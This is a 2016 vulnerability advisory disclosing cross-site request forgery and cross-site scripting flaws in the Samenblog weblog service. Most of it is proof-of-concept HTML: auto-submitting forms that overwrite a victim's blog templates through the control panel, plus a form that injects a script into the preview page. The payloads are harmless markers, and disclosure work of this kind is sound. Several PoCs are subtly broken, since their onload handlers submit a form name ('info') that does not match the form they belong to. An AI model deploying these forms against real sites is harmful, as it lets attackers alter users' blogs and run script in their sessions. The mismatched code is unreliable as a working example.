SamenBlog Weblog Service Cross Site Request Forgery / Cross Site Scripting

Document Title:
===============
SamenBlog Weblog Service - Cross Site Request Forgery / Cross Site Scripting


References (Source):
====================
http://ehsansec.ir/advisories/samenblog-xsrf-xss.txt


Release Date:
=============
2016-02-20


Product & Service Introduction:
===============================
Samenblog allows its users to publish their information, memories,
essays, etc to experience and enjoy a professional weblog-publishing
system in a basic environment and also it has tried to provide a
system for both professional and amateur users.


Vulnerability Type:
=========================
Cross Site Request Forgery
Cross Site Scripting

Vulnerability Details:
==============================
I discovered a client-side cross site request forgery web
vulnerability and a cross site scripting vulnerability in
Samenblog.com (Weblog Service).


Author:
=================
Ehsan Hosseini
http://ehsansec.ir/


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium




Proof of Concept (PoC):
=======================
-- Cross Site Request Forgery --
-- PoC :  Edit Themes  --

-- PoC 1 --

<html>
<head>
	<title>Edit Weblog Template - Csrf</title>
</head>
<body onload="document.info.submit()">
	<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='info'>
		<input type="hidden" name="template" value="<h1> PoC </h1>">
		<input type='hidden' name='task' value='doedit'>
	</form>
</body>

-- PoC 2 --

<html>
<head>
	<title>Edit The extra pages templates - Csrf</title>
</head>
<body onload="document.info.submit()">
	<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='infoo'>
		<input name='templatepage' value="<h1> PoC </h1>">
		<input type='hidden' name='task' value='doeditpage'>
	</form>
</body>
</html>

-- PoC 3 --

<html>
<head>
	<title>Edit The archive templates - Csrf</title>
</head>
<body onload="document.info.submit()">
	<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='infooo'>
		<input name='templatearchive' value="<h1> PoC </h1>">
		<input type='hidden' name='task' value='doeditarchive'>
	</form>
</body>
</html>

-- Cross Site Scripting --

<html>
<head>
	<title>Cross Site Scripting</title>
</head>
<body onload="document.info.submit()">
	<form action='http://samenblog.com/cpanel/preview.php' method='POST'
name='preview'>
		<input name='templatearchive' value="<script>alert('Ehsan')</script>">
	</form>
</body>
</html>


Author:
==================
Ehsan Hosseini
http://ehsansec.ir/

Contact:
========
hehsan979@gmail.com
info@ehsansec.ir